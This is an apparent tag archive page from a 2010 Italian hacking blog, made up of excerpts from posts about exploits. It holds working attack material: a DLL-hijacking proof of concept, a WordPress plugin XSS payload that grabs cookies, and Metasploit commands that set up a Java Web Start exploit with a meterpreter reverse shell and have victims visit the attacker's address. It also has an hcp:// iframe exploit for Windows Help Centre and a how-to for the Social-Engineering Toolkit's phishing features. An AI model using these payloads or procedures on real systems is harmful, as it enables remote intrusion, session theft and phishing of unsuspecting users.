Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Tag: ‘exploit’

[MOAUB]Oday on Exploit-DB(Cpanel<=11.25 and Adobe [Flash Player/Acrobat] )

settembre 1st, 2010 by clshack

E parte finalmente questo fantastico progetto:

The Abysssec Security Team is about to unleash its Month Of Abysssec Undisclosed Bugs on us. Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc. The 0day collection includes PoCs and Exploits for Microsoft Excel, Internet Explorer, Microsoft codecs, Cpanel and others. The MOAUB will be hosted on the Exploit Database, and will be updated on a daily basis. Get your hard-hats on, your VM’s and debugging tools organized – it’s gonna be a an intensive ride. Follow both the exploit-db and Abysssec twitter feed to keep updated!

Ed ecco gli oday di settembre by Abysssec:
Title : Cpanel PHP Restriction Bypass Vulnerability
Version : < = 11.25
Discovery : http://www.abysssec.com
Vendor : http://www.cpanel.net
Impact : Ciritical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.It can help attacker to bypass restriction such as mod_security , Safemod and disable functions.

(continua...)

Tags: , , , ,
Posted in Hacking | 7 Comments »

Apple QuickTime <= 7.7.7 “_Marshaled_pUnk” Remote Code Execution

agosto 31st, 2010 by clshack

Il 12 agosto 2010 è stata fixata con la versione 7.6.7 di QuickTime una falla critica che permetteva l’esecuzione di codice remoto sul pc vittima.

[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow

Ora il 31 agosto 2010, QuickTime soffre ancora e mette a repentaglio la sicurezza degli utenti.

Vediamo come sfruttare questo exploit con metasploit o.O

Aggiorniamo metasploit:
sudo svn update
Prendiamo l’exploit:
use windows/browser/apple_quicktime_marshaled_punk
(continua…)

Tags: , , , , , ,
Posted in Hacking | 7 Comments »

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

agosto 25th, 2010 by clshack

Questa nuova (non così nuova -.-’ ) del DLL Hijacking Exploit sta aprendo le porte a moltissimi virus.
Una immagine illustrativa di alcune applicazzioni vulnerabili:

Applicazioni che vanno incorporate di windows, a firefox e molte altre ancora.

Come funziona questa tecnica ?
(detta alla cazzo di cane merda -.-’ fuck off )
Durante la scrittura di applicazioni, si setta che il programma vada a prendersi delle funzioni contenute nelle dll (librerie).
La cosa errata è che se il programma richiama la dll “h.dll” e questa dll si trova dentro al file che viene aperto, se la PATH non è imposta il programma andrà a cercare la dll h.dll in varie destinazioni tra cui quella dove è situato il file aperto, perciò il programma, carica la falsa dll che avrà le stesse funzioni, della vera dll ma che eseguirà codice malevolo :D .
Ad esempio questo exploit per l’applicazione wap.exe di windows 7:

#include 
#define DLLIMPORT __declspec (dllexport)
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  evil();
  return 0;
}


(continua…)

Tags: , , ,
Posted in Hacking, Software | 22 Comments »

[WordPress] Redirection Plugin <= 2.2.27 XSS

luglio 30th, 2010 by clshack

# Exploit Title: [Wordpress] Redirection Plugin <= 2.2.27 XSS
# Date: 29-07-2010
# Author: clshack
# Software Link: http://wordpress.org/extend/plugins/redirection/
# Version: <=2.2.27
# Tested on: wordpress 3.0.1


Page: redirection/view/admin/log.php
Line:13
<input type="hidden" name="sub" value="<strong><?php echo $_GET['sub'] ?></strong>"/>
Exploit:
wp-admin/tools.php?page=redirection.php&curpage=1&sub=log&sub="><script>alert(document.cookie)</script>
Bisogna filtrare l’input :D

Approfondimenti XSS.

Tags: , ,
Posted in Hacking | 5 Comments »

[How To] Social Engineering Toolkit with Metasploit

giugno 27th, 2010 by clshack

Il Social-Engineering Toolkit (SET) è stato realizzato da David Kennedy e mette a disposizione degli attacker alcuni notevoli exploit, di tipo Social-Engineering con una comoda interfaccia :D

L’obiettivo principale di SET è la automazione di tali attacchi, sfruttando quasi sempre la stupidità umana.

Vediamo come utilizzarlo.
sudo apt-get install python-pexpect
Dobbiamo fare un link simbolico altrimenti non va SET se non abbiamo backtrack 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
Ad esempio:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/


Andiamo nel terminale, e scarichiamo la versione più aggiornata:

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET
sudo ./set
Una volta aperto, avremo un menù un po’ lamerico -.-’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Vediamo nel dettaglio le opzioni.

1. Spear-Phishing Attack Vectors
Digitando 1, avremo sostanzialmente 3 opzioni:

  • Perform a Mass Email Attack
  • Create a FileFormat Payload
  • Create a Social-Engineering Template

(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 8 Comments »

[Metasploit]Sun Java Web Start Plugin Remote Code Excution

giugno 27th, 2010 by clshack

Exploit, abbastanza vecchio, CVE-2010-0886, ma ne parlo lo stesso per un ovvio motivo.

Se siete su windows, account limitato, java NON SI AGGIORNA, al meno che non abbiate la password di amministrator.
Problema al quanto risolvibile, almeno per me, ma non per molti altri.

Soluzioni contro questo exploit ?
Upgrade to J2SE 1.4.2_07
Upgrade to J2SE 5.0 Update 2

Ma se uno è utente limitato come fa ad aggiornare, al meno che non ci sia un server che distribuisca e installa gli aggiornamenti all’avvio/spegnimento di windows, cosa rara, gli utenti sono tutti FOTTUTI.

Vediamo come usare questo exploit, in metasploit:
sudo svn update
sudo ./msfconsole
use windows/browser/java_ws_arginject_altjvm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set SRVPORT 80

Se avete apache:
sudo service apache2 stop

set URIPATH /
exploit
Output simile:
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.39:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.39:80/
[*] Server started.

Ora facciamo visitare alla vittima:
http://YOUR_IP:80
Output simile:

[*] Request for "/" does not contain a sub-directory, redirecting to /X2EbB9v10GNe/ ...
[*] Responding to "GET /X2EbB9v10GNe/" request from 192.168.1.154:1105
[*] Sending js detection HTML to 192.168.1.154:1105...
[*] Responding to "GET /X2EbB9v10GNe/ijIcZf4C.shtml" request from 192.168.1.154:1105
[*] Sending JS version HTML to 192.168.1.154:1105...

E se tutto va bene:
sessions -i 1

e vi si pare meterpreter :D

Tags: , , , ,
Posted in Hacking | 5 Comments »

[CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution

giugno 20th, 2010 by clshack

E dopo la gente, si chiede come fanno i virus ad entrare nei loro computer WINDOWS… fino che usate software buggati, per lo più lenti e schifosi, come flash player… speriamo che HTML 5 porti via tutto questo ;)

In tanto vediamo come sfruttare questa vulnerabilità per adobe flash palyer, con metasploit :D

Adobe Flash Player “newfunction” Invalid Pointer Use

CVE-2010-1297
This exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player.
Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code executiong is achieved by embedding a specially crafted Flash movie into a PDF document.
An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled.

Platforms Affected:

  • Adobe Acrobat 9.0 Standard
  • Adobe Acrobat 9.0
  • Adobe Acrobat 9.0.0
  • Adobe Acrobat 9.1
  • Adobe Acrobat 9.1 Standard

    • (continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 7 Comments »

[tutorial]Tool for Vulnerability Identification level WEB

giugno 19th, 2010 by clshack

Ed eccomi di nuovo, in questo articolo, parleremo di tool, per il penetration-test, a livello di applicazioni web.
Molte volte troviamo siti defacciati, beh non è sempre colpa dei cms vulnerabili, dipende anche da modifiche da noi apportate, che magari li rendono poco sicuri.
E dopo, vi trovate index cosi:

Dopo queste:
[tutorial]Tool for Information Gathering
 [tutorial]Tool for Network Mapping
[tutorial]Tool for Vulnerability Identification level Server

Vediamo ora come identificare vulnerabilità, a livello di web applications…
I tools, da me proposti sono i seguenti:

    ===WEB VULNERABILITY SCANNER===
  • Wapiti: Web application security Scanner
  • Grendel-Scan:web application security testing tool
  • SkipFish: Google security Scanner
  • Websecurify
  • w3af:Web Application Attack and Audit Framework
  • SqlMap
  • Fimap: Scanner LFI(Local File Inclusion ) and RFI(Remote File Inclusion)

    • ===FINGER PLUGIN AND VERSION===

  • WhatWeb
  • Plecost: A WordPress Penetration-Test for Plugins
  • OWASP Joomla Vulnerability Scanner

    • ===CODE ANALYTICS===

  • RIPS:source code analyser for vulnerabilities in PHP
  • RATS: Rough Auditing Tool for Security
  • Pixy

(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[EXPLOIT]Windows Help Centre Remote code Excution

giugno 10th, 2010 by clshack

Un altro exploit per windows, che permette l’esecuzione di comandi sul pc della vittima.
Bisogna passare a linux :D

Ma vediamo come funziona questo exploit, chiamato:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

Questo exploit, sfruttando i file asx possiamo aprire il windows help con un url malformato e far aprire ad esempio la
calcolatrice :D

I file asx, sono:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

L’url malformato in questione è composto cosi:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">
(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 1 Comment »

[FIXED]Exploit-Finder

giugno 9th, 2010 by clshack

Fixato l’exploit finder :D

Link:
http://www.clshack.it/exploit-finder

Database:

  • Exploit-Db;
  • Milw0rm;
  • SecurityReason;
  • Inj3ct0r;
Tags:
Posted in Servizi WEB | No Comments »
« Older Entries